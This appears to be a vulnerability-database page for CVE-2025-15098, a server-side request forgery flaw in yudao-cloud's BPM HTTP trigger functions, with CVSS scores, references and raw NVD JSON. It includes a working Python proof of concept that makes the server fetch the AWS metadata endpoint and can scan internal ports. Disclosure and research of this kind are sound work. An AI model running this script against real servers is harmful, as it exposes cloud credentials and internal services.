CVE-2025-15098

Description

A vulnerability was determined in YunaiV yudao-cloud up to 2025.11. This affects the function BpmHttpCallbackTrigger/BpmSyncHttpRequestTrigger of the component Business Process Management. Executing manipulation of the argument url/header/body can lead to server-side request forgery. The attack may be performed from remote. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score

6.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

YunaiV yudao-cloud <= 2025.11

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2025-15098 PoC - SSRF in yudao-cloud BPM Component
# Target: BpmHttpCallbackTrigger or BpmSyncHttpRequestTrigger

TARGET_URL = "http://target-server/api/bpm/callback/trigger"
SSRF_TARGET = "http://169.254.169.254/latest/meta-data/"  # AWS metadata endpoint

def exploit_ssrf(target_url, ssrf_url):
    """
    Exploit SSRF vulnerability by manipulating the url parameter
    in BpmHttpCallbackTrigger/BpmSyncHttpRequestTrigger
    """
    payload = {
        'url': ssrf_url,
        'header': '{"Content-Type": "application/json"}',
        'body': '{"callback_data": "test"}',
        'method': 'GET'
    }
    
    try:
        print(f"[*] Sending SSRF payload to {target_url}")
        print(f"[*] Target URL: {ssrf_url}")
        
        response = requests.post(target_url, json=payload, timeout=10)
        
        print(f"[+] Status Code: {response.status_code}")
        print(f"[+] Response: {response.text[:500]}")
        
        return response
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return None

def check_internal_port(target_url, internal_ip, port):
    """Check internal network ports via SSRF"""
    ssrf_url = f"http://{internal_ip}:{port}"
    payload = {'url': ssrf_url}
    
    try:
        response = requests.post(target_url, json=payload, timeout=5)
        print(f"[*] Port {port}: Reachable (Status {response.status_code})")
        return True
    except:
        print(f"[*] Port {port}: Not reachable or filtered")
        return False

if __name__ == "__main__":
    print("CVE-2025-15098 SSRF PoC")
    print("=" * 50)
    
    # Example 1: AWS metadata SSRF
    exploit_ssrf(TARGET_URL, SSRF_TARGET)
    
    # Example 2: Internal port scan
    # for port in [22, 80, 443, 3306, 6379]:
    #     check_internal_port(TARGET_URL, "127.0.0.1", port)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-15098
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-15098
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-15098/
[4] VulDB https://vuldb.com/cve/CVE-2025-15098
[5] https://github.com/AnalogyC0de/public_exp/blob/main/archives/yudao-cloud-bpm_SSRF/report.md
[6] https://github.com/AnalogyC0de/public_exp/blob/main/archives/yudao-cloud-bpm_SSRF/report.md#proof-of-concept
[7] https://vuldb.com/?ctiid.338429
[8] https://vuldb.com/?id.338429
[9] https://vuldb.com/?submit.710170

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-15098", "sourceIdentifier": "[email protected]", "published": "2025-12-26T03:15:50.460", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was determined in YunaiV yudao-cloud up to 2025.11. This affects the function BpmHttpCallbackTrigger/BpmSyncHttpRequestTrigger of the component Business Process Management. Executing manipulation of the argument url/header/body can lead to server-side request forgery. The attack may be performed from remote. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-918"}]}], "references": [{"url": "https://github.com/AnalogyC0de/public_exp/blob/main/archives/yudao-cloud-bpm_SSRF/report.md", "source": "[email protected]"}, {"url": "https://github.com/AnalogyC0de/public_exp/blob/main/archives/yudao-cloud-bpm_SSRF/report.md#proof-of-concept", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.338429", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.338429", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.710170", "source": "[email protected]"}]}}